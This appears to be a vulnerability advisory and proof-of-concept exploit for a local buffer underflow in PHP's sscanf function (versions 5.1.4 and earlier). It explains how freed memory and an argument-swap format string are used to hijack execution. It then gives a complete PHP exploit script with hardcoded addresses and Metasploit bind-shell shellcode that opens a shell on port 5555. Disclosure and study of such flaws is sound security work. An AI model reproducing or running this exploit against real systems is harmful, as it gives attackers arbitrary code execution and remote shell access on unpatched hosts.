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php local buffer underflow could lead to arbitary code execution



Affected versions: php 5.1.4 and older, 4.4.3 and possibly older

Cause: when php-s sscanf functions format argument contains argument swap
  and extra arguments are given like.
  sscanf('foo ','$1s',$bar) then it reads an pointer to pointer to
  zval structure past the end of argument array by one.

Php developers were notified and response and patching was quick. php bug 
tracker thread here: http://bugs.php.net/bug.php?id=38322

Vulnearability is fixed in CVS.

Exploiting:

Attacker needs a double pointer to writable segment in remote binary which can 
be obtained by
compiling a binary based on all info known about remote host and disassembling 
binary and searching.

This exploit first fills php internally cached memory with address of pointer 
(double pointer)
  to writable segment. Then by unsetting the variable it frees memory, but does 
not
  zero it, so this way we pass our own pointers to sscanf.

  Now sscanf allocated array has valid element one past the array,
  sscanf tries to call a function to destruct zval structure.
  if its 15-th byte isnt anything valid it will default to doing nothing
  and will continue without errors and returns;

  sscanf now sets the structure to be of type string and writes
  pointer to string  (it matched from our first argument to sscanf) and strings
  length to a structure-s value union. the strings address is written to first 
4 bytes
  of structure.

  knowing this we construct our own binary zval structure of type object. + 
shellcode + space
  to match format. So now we have successfully called sscanf for the first time
  and we got something like ptrptr->ptr->zval-of-type-string in memory
  zval-of-type-string first 4 bytes point to our object we passed as argument.

  so now we fill the internal cached memory with just pointer to zval. and free 
it.
  when sscanf reads the pointer this time it now moves upwards one level but 
still
  dereferences twice. thus acts upon our zval structure of type object.
  when the destructor function now sees the zval is an object it will read
  a pointer from our structure to another structure which supposed to contain 
function
  pointers. it will call whatever the 2-cond element points to. all elements 
are 4 bytes long
  thus address pointed to by structures offset 4 is called.
  when we give it our ptr-to-zval - 4
  it will add 4 bytes to it and dereference it an call whatever is there. and
  there is address to our constructed zval object so we are executing code
  from the beginning of our structure. eip-hop-over will help us through
  unwanted bytes and we are on our way executing our shellcode.

<?php

/*
POC developed by Heintz.
Greets to Waraxe from www.waraxe.us
All buds from www.plain-text.info
Torufoorum

Thanks to metasploit.com for shellcode loan.
*/

// tested addresses from php5ts.dll (php 5.1.4) running win x64 pro
// $ptr_to_ptr_to_zval = "\x10\x43\x54\xCC";
// $ptr_to_zval = "\x10\x43\x54\xB0";
// $ptr_to_obj_handlers = "\x10\x43\x54\xAC"; // $ptr_to_zval-4


// addresses from php 5.1.4 cli, compiled with gcc version 3.3.6,
// kernel 2.6.14-hardened-r3
$ptr_to_ptr_to_zval = "\x08\x1A\x64\xC8";
$ptr_to_zval = "\x08\x1A\x60\x0C";
$ptr_to_obj_handlers = "\x08\x1A\x60\x08"; // $ptr_to_zval-4
// nop, nop, nop, mov eax,nex-4-bytes. to disarm 4 next bytes
$eip_hop_over = "\x90\x90\x90\xB8";

# linux_ia32_bind -  LPORT=5555 Size=108 Encoder=PexFnstenvSub 
http://metasploit.com
$shellcode =
"\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef".
"\x57\xe6\x92\x83\xeb\xfc\xe2\xf4\xde\x8c\xb5\xd1\xbc\x3d\xe4\xf8".
"\x89\x0f\x7f\x1b\x0e\x9a\x66\x04\xac\x05\x80\xfa\xfa\xe4\x80\xc1".
"\x66\xb6\x8c\xf4\xb7\x07\xb7\xc4\x66\xb6\x2b\x12\x5f\x31\x37\x71".
"\x22\xd7\xb4\xc0\xb9\x14\x6f\x73\x5f\x31\x2b\x12\x7c\x3d\xe4\xcb".
"\x5f\x68\x2b\x12\xa6\x2e\x1f\x22\xe4\x05\x8e\xbd\xc0\x24\x8e\xfa".
"\xc0\x35\x8f\xfc\x66\xb4\xb4\xc1\x66\xb6\x2b\x12";

if(bin2hex(pack('S',0x0010))!="0010")
{       // small endian conversion
        $t = $ptr_to_ptr_to_zval;
        $ptr_to_ptr_to_zval = $t{3}.$t{2}.$t{1}.$t{0};

        $t = $ptr_to_zval;
        $ptr_to_zval = $t{3}.$t{2}.$t{1}.$t{0};

        $t = $ptr_to_obj_handlers;
        $ptr_to_obj_handlers = $t{3}.$t{2}.$t{1}.$t{0};
}

$object_zval = $eip_hop_over.$ptr_to_obj_handlers.$eip_hop_over.
               "\x05\x01\x90\x90".$shellcode."\xC3\x90\x90\x20";

$str = str_repeat($ptr_to_ptr_to_zval,20);
unset($str);

sscanf(
$object_zval,
'%1$s',
$str);

putenv("PHP_foo=".str_repeat($ptr_to_zval,64));
putenv("PHP_foo=");

sscanf(
"a ",
'%1$s',
$str);


?>